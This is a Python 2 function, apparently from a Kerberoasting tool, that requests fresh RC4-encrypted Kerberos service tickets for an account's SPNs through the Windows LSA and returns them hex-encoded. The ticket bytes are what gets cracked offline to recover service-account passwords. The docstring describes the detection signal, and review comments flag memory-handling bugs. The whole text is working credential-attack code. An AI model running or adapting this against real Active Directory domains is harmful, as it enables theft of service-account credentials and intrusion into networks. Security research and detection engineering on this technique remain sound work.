def Get_TGS(hLsaConnection, dwKerberosAuthenticationPackageId, SPNentry):
    """Ask the local LSA for a service ticket for each SPN of one account.

    For every ';'-separated SPN in SPNentry["serviceprincipalname"] a
    KERB_RETRIEVE_TKT_REQUEST is built in LocalAlloc'd memory and handed to
    LsaCallAuthenticationPackage. The first ticket the KDC returns is
    hex-encoded and returned; remaining SPNs are not tried.

    Args:
        hLsaConnection: LSA handle obtained by the caller (not shown here).
        dwKerberosAuthenticationPackageId: package id of the Kerberos
            authentication package, looked up by the caller.
        SPNentry: mapping with at least "serviceprincipalname" (';'-separated
            SPNs) and "samaccountname" (used only in diagnostics).

    Returns:
        Lowercase hex string of the DER-encoded ticket on the first success,
        or the int 0 when no SPN yielded a ticket. Callers must test for
        `== 0` rather than truthiness of a str.

    Side effects:
        Each attempt sends a TGS-REQ to the KDC because the cache is bypassed
        (see CacheOptions below); the request asks for RC4-HMAC (etype 23).
        On a domain controller this is visible as Kerberos service-ticket
        request auditing (ticket encryption type 0x17), which is what
        detection content for this technique keys on.
    """
    # LPTR = LMEM_FIXED | LMEM_ZEROINIT: fixed, zero-filled allocation.
    LPTR = (0x0000 | 0x0040)
    list_of_target = SPNentry["serviceprincipalname"].split(";")
    for target in list_of_target:
        # SPN is lowered before it is placed in the request.
        szSPN = create_unicode_buffer(target.lower())
        # Byte length of the SPN in UTF-16 code units, without a terminator.
        # NOTE(review): uses len(target), not the buffer length; for
        # characters outside the BMP the two can differ — confirm.
        dwSPNSize = USHORT((len(target)) * sizeof(wchar_t))
        # Request struct followed by the SPN bytes, allocated in one block.
        dwTicketPayloadSize = DWORD(sizeof(KERB_RETRIEVE_TKT_REQUEST) + dwSPNSize.value)
        KerbRetrieveEncodedTicketMessage = 8
        KERB_ETYPE_RC4_HMAC_NT = 23
        KERB_RETRIEVE_TICKET_DONT_USE_CACHE = (0x1)
        dwKerbRetrieveTicketRequestAddress = windll.kernel32.LocalAlloc(LPTR, dwTicketPayloadSize.value)
        pKerbRetrieveTicketRequest = cast(dwKerbRetrieveTicketRequestAddress, PKERB_RETRIEVE_TKT_REQUEST)
        pKerbRetrieveTicketRequest.contents.MessageType = KerbRetrieveEncodedTicketMessage
        # LogonID 0 = current logon session context
        pKerbRetrieveTicketRequest.contents.LogonID = 0
        # TargetName is a UNICODE_STRING pointing just past the struct.
        pKerbRetrieveTicketRequest.contents.TargetName.Length = USHORT(dwSPNSize.value)
        # NOTE(review): MaximumLength claims one extra wchar_t, but the
        # allocation above reserved only dwSPNSize bytes after the struct;
        # the terminator slot is not actually allocated — confirm intent.
        pKerbRetrieveTicketRequest.contents.TargetName.MaximumLength = USHORT(dwSPNSize.value + sizeof(wchar_t))
        dwKerbRetrieveTicketRequestBufferAddress = dwKerbRetrieveTicketRequestAddress + sizeof(KERB_RETRIEVE_TKT_REQUEST)
        # Copies exactly Length bytes of the SPN (no NUL) into the tail.
        memmove(dwKerbRetrieveTicketRequestBufferAddress, szSPN, pKerbRetrieveTicketRequest.contents.TargetName.Length)
        pKerbRetrieveTicketRequest.contents.TargetName.Buffer = cast(dwKerbRetrieveTicketRequestBufferAddress, PWSTR)
        pKerbRetrieveTicketRequest.contents.TicketFlags = ULONG(0)
        # Bypass the ticket cache: forces a fresh TGS-REQ for every SPN.
        pKerbRetrieveTicketRequest.contents.CacheOptions = KERB_RETRIEVE_TICKET_DONT_USE_CACHE
        # Explicitly requests RC4-HMAC (etype 23) rather than AES.
        pKerbRetrieveTicketRequest.contents.EncryptionType = KERB_ETYPE_RC4_HMAC_NT
        # Zeroed SecHandle: no explicit credentials handle is supplied.
        pKerbRetrieveTicketRequest.contents.CredentialsHandle = SecHandle()
        pKerbRetrieveTicketResponse = PVOID()
        pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
        dwProtocolStatus = DWORD(0)
        # dwTicketPayloadSize is passed by value as the submit length and
        # by reference as the return-buffer length, so after the call it
        # holds the size of the LSA-allocated response, not the request.
        status = LsaCallAuthenticationPackage(hLsaConnection, dwKerberosAuthenticationPackageId, pKerbRetrieveTicketRequest, dwTicketPayloadSize, byref(pKerbRetrieveTicketResponse), byref(dwTicketPayloadSize), byref(dwProtocolStatus))
        # NOTE(review): LocalFree is given the cast pointer object rather
        # than dwKerbRetrieveTicketRequestAddress; confirm ctypes passes the
        # same HLOCAL, otherwise the request block is never released.
        windll.kernel32.LocalFree(pKerbRetrieveTicketRequest)
        if status == STATUS_SUCCESS and dwProtocolStatus.value == STATUS_SUCCESS and dwTicketPayloadSize.value != 0:
            pKerbRetrieveTicketResponse = cast(pKerbRetrieveTicketResponse, PKERB_RETRIEVE_TKT_RESPONSE)
            pEncodedTicket = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicket
            dwEncodedTicketSize = pKerbRetrieveTicketResponse.contents.Ticket.EncodedTicketSize
            # Hex-encode the encoded ticket, two lowercase digits per byte.
            Ticket = ""
            for i in range(dwEncodedTicketSize):
                Ticket += hex(pEncodedTicket[i]).replace("0x",'').zfill(2)
            LsaFreeReturnBuffer(pKerbRetrieveTicketResponse)
            return Ticket
        else:
            # NOTE(review): if LSA allocated a return buffer but the protocol
            # status is non-zero, it is not freed on this path — confirm.
            print " [-] Cannot retrieve ticket for account '%s' and SPN '%s', status: %s ; protocolstatus: %s" % (SPNentry["samaccountname"], target, hex(status), hex(dwProtocolStatus.value))
            print " [+] Trying the next one."
    # Reached only when every SPN failed; returns int 0, not a str.
    print "[-] Could not retrieve any ticket for account '%s' and the list of SPN: '%s'" % (SPNentry["samaccountname"], SPNentry["serviceprincipalname"])
    return 0